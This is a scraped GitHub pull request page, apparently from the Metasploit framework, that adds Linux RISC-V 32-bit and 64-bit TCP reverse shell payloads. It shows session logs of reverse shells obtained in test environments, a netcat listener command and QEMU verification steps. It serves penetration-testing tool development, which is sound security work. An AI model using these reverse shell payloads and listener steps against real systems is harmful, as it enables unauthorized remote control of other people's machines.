-
Notifications
You must be signed in to change notification settings - Fork 14.7k
Add Linux RISC-V 32-bit/64-bit TCP reverse shell payloads #20712
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Conversation
003bbc9 to
dffbcd6
Compare
dffbcd6 to
bb5ea49
Compare
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
msf payload(linux/riscv64le/shell_reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...
id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),102(lxd)
ls
chmod_64.elf
notreadme
revshell_riscv64.elf
echo ":)"
:)
uname -a
Linux ubuntu 6.14.0-13-generic #13.2-Ubuntu SMP PREEMPT_DYNAMIC Sun Apr 6 05:26:54 UTC 2025 riscv64 riscv64 riscv64 GNU/Linux
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
msf payload(linux/riscv32le/shell_reverse_tcp) > sessions -i -1
[*] Starting interaction with 2...
Shell Banner:
= 2
293092 dup3(3,1,0) = 1
293092 dup3(3,0,0) = 0
293092 execve("/bin/sh",{)
-----
id
uid=1000(kali) gid=1000(kali) groups=1000(kali),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),100(users),101(netdev),106(bluetooth),113(scanner),136(wireshark),137(kaboxer),141(docker)
ls
a.out
chmod_32.elf
chmod_64.elf
metsrv.exe
metsrv.mipsel
metsrv.og.mipsel
metsrv.x64.exe
mips_sc.s
notreadme
payload.aarch64.exe
revshell_riscv32.elf
revshell_riscv64.elf
uname -a
Linux kali 6.16.8+kali-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.16.8-1kali1 (2025-09-24) x86_64 GNU/Linux
|
@bcoles would you mind rebase this? thanks! |
done |
Release NotesThis adds Linux RISC-V 32-bit/64-bit TCP reverse shell payloads. |
Add Linux RISC-V 32-bit/64-bit TCP reverse shell payloads.
Source
Verification
Tested with QEMU. For other test environments, see #19518 (comment).
Generate a Linux Command Shell, Reverse TCP Inline payload (with optional NOP sled):
Start a netcat listener
nc -lvp 1337(or useexploit/multi/handler).Execute the payload with QEMU:
Note the payload was executed successfully and a reverse shell was received :)